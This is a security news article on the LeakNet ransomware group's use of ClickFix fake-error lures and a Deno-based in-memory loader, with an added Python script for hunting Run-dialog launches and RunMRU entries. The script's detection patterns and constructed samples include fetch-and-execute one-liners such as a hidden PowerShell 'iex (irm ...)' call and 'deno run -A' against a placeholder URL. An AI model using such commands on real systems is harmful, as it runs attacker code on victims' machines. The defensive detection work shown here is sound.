The ransomware group LeakNet is now using the ClickFix social engineering technique to gain initial access, tricking visitors of compromised websites into executing malicious commands themselves. The shift to self-managed initial access reduces the group's reliance on external access brokers, and the campaign delivers a JavaScript-based loader, built on the Deno runtime, that runs payloads directly in memory.
The LeakNet ransomware operation has recently updated its tactics by incorporating the ClickFix social engineering method to breach target networks. The approach involves compromising legitimate websites to display fake error messages or CAPTCHA prompts that instruct visitors to run a command by hand. Because the user, not the attacker, launches that command while believing they are fixing a routine technical problem, the attackers sidestep controls aimed at malicious attachments and exploit delivery and gain a foothold on the victim's system without purchasing stolen credentials from external brokers.
This transition marks a significant strategic change for the group, which first appeared in late 2024 under the guise of a digital watchdog focused on transparency. By managing their own initial access through ClickFix, LeakNet lowers its operational costs and avoids the delays associated with waiting for high-value accounts to become available on the underground market. The campaign is not limited to any specific industry, as the group is currently casting a wide net to maximize the number of potential infections across various sectors.
Technically, these attacks are notable for their use of a staged command and control loader built on the Deno JavaScript runtime (a standalone JavaScript/TypeScript runtime distributed as a single executable). Executing the malicious payload directly in the process's memory, rather than writing it to disk, makes the activity harder for file-based antivirus software to detect; the loader's own process creation and outbound connections still surface in endpoint and network telemetry, however. Once the initial breach is successful, the attackers follow a consistent post-exploitation sequence that remains the same regardless of how they first entered the network.
The effectiveness of ClickFix lies in its abuse of trusted, everyday computer workflows. The lure instructs the user to open a legitimate Windows tool such as the Run dialog (Win+R) and paste in a command that the page has typically already placed on the clipboard, so the process feels safe and routine to an average employee. This exploitation of human trust lets the group bypass many automated defenses designed to stop more traditional delivery methods such as malicious email attachments or the exploitation of software vulnerabilities.
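The Run-dialog workflow described above leaves two host artifacts a defender can hunt on: a process whose parent is explorer.exe (which hosts the Run dialog) and the RunMRU registry history of commands typed into that dialog. The script below is an added example written for this page, not code from the article or from LeakNet tooling. The event records and RunMRU values are constructed to resemble Sysmon Event ID 1 fields and the HKCU RunMRU key; the launcher list, the command-line patterns and the `\1` suffix convention for RunMRU data are assumptions to verify against your own telemetry.

```python
"""Hunt for ClickFix-style commands launched from the Windows Run dialog.

Added example for this page; not the article's or any vendor's code. The
sample events and registry values below are constructed, not captured.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Interpreters/runtimes a ClickFix one-liner typically hands the payload to.
# deno.exe is included because the article describes a Deno-based loader; the
# remaining entries are commonly abused launchers (assumption, extend as needed).
LAUNCHERS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "deno.exe",
    "curl.exe", "certutil.exe", "bitsadmin.exe",
}

# Command-line traits of a staged, remotely fetched payload (assumed heuristics).
PATTERNS = {
    "remote URL": re.compile(r"https?://", re.I),
    "download cmdlet": re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I),
    "invoke-expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "encoded command": re.compile(r"\s-e(?:c|nc|ncodedcommand)\b", re.I),
    "deno runtime": re.compile(r"\bdeno(?:\.exe)?\s+(?:run|eval)\b", re.I),
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
}


@dataclass
class Finding:
    index: int        # position of the event in the input list
    image: str        # basename of the launched executable
    reasons: list[str]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_command(cmdline: str) -> list[str]:
    """Return the names of every pattern that matches the command line."""
    return [name for name, rx in PATTERNS.items() if rx.search(cmdline)]


def hunt(events: list[dict]) -> list[Finding]:
    """Flag launcher processes spawned by explorer.exe with suspicious arguments.

    explorer.exe is also the parent of anything double-clicked on the desktop,
    so the launcher list and the command-line patterns do the real filtering.
    """
    findings = []
    for i, ev in enumerate(events):
        if basename(ev["ParentImage"]) != "explorer.exe":
            continue
        image = basename(ev["Image"])
        if image not in LAUNCHERS:
            continue
        reasons = score_command(ev["CommandLine"])
        if reasons:
            findings.append(Finding(i, image, reasons))
    return findings


def parse_runmru(values: dict) -> list[str]:
    """Return Run-dialog history, most recent first.

    HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU keeps
    each entry in a single-letter value whose data ends in "\\1"; MRUList holds
    the letters most-recent-first (assumed format, check it on a live host).
    """
    history = []
    for letter in values.get("MRUList", ""):
        data = values.get(letter)
        if data is None:
            continue
        history.append(data[:-2] if data.endswith("\\1") else data)
    return history


def hunt_runmru(values: dict) -> list[tuple[str, list[str]]]:
    """Score every RunMRU entry and return the ones that match a pattern."""
    return [(cmd, score_command(cmd)) for cmd in parse_runmru(values) if score_command(cmd)]


# Constructed Sysmon-style process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm https://example.invalid/verify)"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Users\alice\.deno\bin\deno.exe",
     "CommandLine": "deno run -A https://example.invalid/loader.js"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",   # not a Run-dialog launch, ignored here
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -c "iex (irm https://example.invalid/x)"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c dir"},
]

# Constructed RunMRU values as they might appear in a registry export.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": r"calc\1",
    "b": r"notepad\1",
    "c": r'powershell -w hidden -c "iex (irm https://example.invalid/verify)"\1',
}

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"event {f.index}: {f.image} -> {', '.join(f.reasons)}")
    for cmd, reasons in hunt_runmru(SAMPLE_RUNMRU):
        print(f"RunMRU: {cmd!r} -> {', '.join(reasons)}")
```

Treat a hit as a lead, not a verdict: a helpdesk script pasted into Win+R produces the same parent/child shape, so pair the process finding with the RunMRU entry and the browser history of the site visited just before it before escalating.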
Despite these evolving entry methods, security researchers emphasize that the group's behavior following the initial breach remains predictable. Because LeakNet follows a repeatable pattern of lateral movement and data exfiltration once inside a network, defenders can concentrate on detecting those post-exploitation behaviors rather than every variant of the lure. Catching the known behaviors in the middle stages of an intrusion gives organizations a better chance of disrupting the operation before any ransomware is actually deployed.
Source: LeakNet Ransomware Leverages ClickFix on Hacked Sites to Deploy Deno Loader